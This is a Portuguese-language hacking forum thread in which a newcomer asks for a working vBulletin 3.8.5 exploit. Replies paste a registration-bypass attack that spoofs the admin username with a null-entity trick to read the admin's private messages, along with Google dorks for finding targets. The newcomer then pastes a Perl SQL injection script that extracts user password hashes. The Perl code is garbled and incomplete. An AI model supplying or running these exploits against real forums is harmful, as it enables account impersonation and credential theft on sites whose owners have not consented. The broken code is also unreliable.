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    Exploit Forum

    Olá pessoal sou novo no fórum, e gostaria de saber se alguem tem algum exploit funcional para o forum vbulletin v.3.8.5.


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    Opa, testa ai:

    ================================================== =============
    vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
    ================================================== =============

    01010101010101010101010101010101010101010101010101 0101010
    0 0
    1 Iranian Datacoders Security Team 2010 1
    0 0
    01010101010101010101010101010101010101010101010101 0101010

    # Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
    # Date: 29/08/2010
    # Author: Immortal Boy
    # Software Link: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    # Version: 3.8.4 & 3.8.5
    # Google dork 1 : powered by vBulletin 3.8.4
    # Google dork 2 : powered by vBulletin 3.8.5
    # Platform / Tested on: Multiple
    # Category: webapplications
    # Code : N/A

    # BUG : ################################################## #######################

    1 > Go to Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    2 > Assume that forum admin user name is ADMIN

    3 > Type this at User Name ===> ADMIN&#00

    4 > &#00 is an ASCII Code

    5 > And complete the other parameters

    6 > Then click on Complete Registrarion

    7 > Now you see that your user name like admin user name

    After this time the private messages to the user (ADMIN) to sending see for you is sending .

    # Patch : ################################################## #####################

    1 > Go to AdminCP

    2 > Click on vBulletin Options and choose vBulletin Options

    3 > Choose Censorship Options

    4 > type &# in Censored Words section

    5 > Then click on Save

    ################################################## ###########################

    Our Website : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute ,

    hosinn , NIK , uones , mohammad_ir & all iranian datacoders members

    ################################################## ###########################
    Pessoal, siga @sirbagda e fique sempre atualizado com materias, videos e afins do mundo hacker.


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      ok, kra eu eu fiz tudo certin so nao entendi a parte do admincp, nao consigo de jeito nenhum, vc poderia me ajudar?

      "After this time the private messages to the user (ADMIN) to sending see for you is sending .

      # Patch : ################################################## #####################

      1 > Go to AdminCP

      2 > Click on vBulletin Options and choose vBulletin Options

      3 > Choose Censorship Options

      4 > type &# in Censored Words section

      5 > Then click on Save"

      essa parte ai em diante nao consigo, to ligado q admincp é o painel de controle, mas nao entendi como acessa ele apartir da conta e talz...

      Eu achei um outro exploit

      use IO::Socket;

      print q{
      ################################################## ####
      # DeluxeBB Remote SQL Injection Exploit #
      # vbulletin Remote SQL Injection Exploit #
      # // SekoMirza // Turkish Hackerz #
      ################################################## ####

      if (!$ARGV[2]) {

      print q{
      Usage: perl dbbxpl.pl host /directory/ victim_userid

      perl dbbxpl.pl Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... /forum/ 1



      $server = $ARGV[0];
      $dir = $ARGV[1];
      $user = $ARGV[2];
      $myuser = $ARGV[3];
      $mypass = $ARGV[4];
      $myid = $ARGV[5];

      print "------------------------------------------------------------------------------------------------\r\n";
      print "[>] SERVER: $server\r\n";
      print "[>] DIR: $dir\r\n";
      print "[>] USERID: $user\r\n";
      print "------------------------------------------------------------------------------------------------\r\n\r\n";

      $server =~ s/(http:\/\/)//eg;

      $path = $dir;
      $path .=

      "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM%20deluxebb_users%

      20WHERE%20(uid='".$user ;

      print "[~] PREPARE TO CONNECT...\r\n";

      $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

      print "[+] CONNECTED\r\n";
      print "[~] SENDING QUERY...\r\n";
      print $socket "GET $path HTTP/1.1\r\n";
      print $socket "Host: $server\r\n";
      print $socket "Accept: */*\r\n";
      print $socket "Connection: close\r\n\r\n";
      print "[+] DONE!\r\n\r\n";

      print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
      while ($answer = <$socket>)

      if ($answer =~/(\w{32})/)

      if ($1 ne 0) {
      print "Password Hash is: ".$1."\r\n";
      print "--------------------------------------------------------------------------------------\r\n";


      print "------------------------------------------------------------------------------------------------\r\n";

      ################################################## #######
      #Shoutz: #
      # #
      # My Sweet -> Caramel #
      # For Mp3s -> Hypn0sis #
      # For Support -> [Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... #
      # My Bro -> PhantomOrchid #
      # My Preceptor -> Earnk Kazno #
      ################################################## #######
      so que nao entendi qual sua funçao real, consegui rodar ele aparece o seguinte

      grato desde já

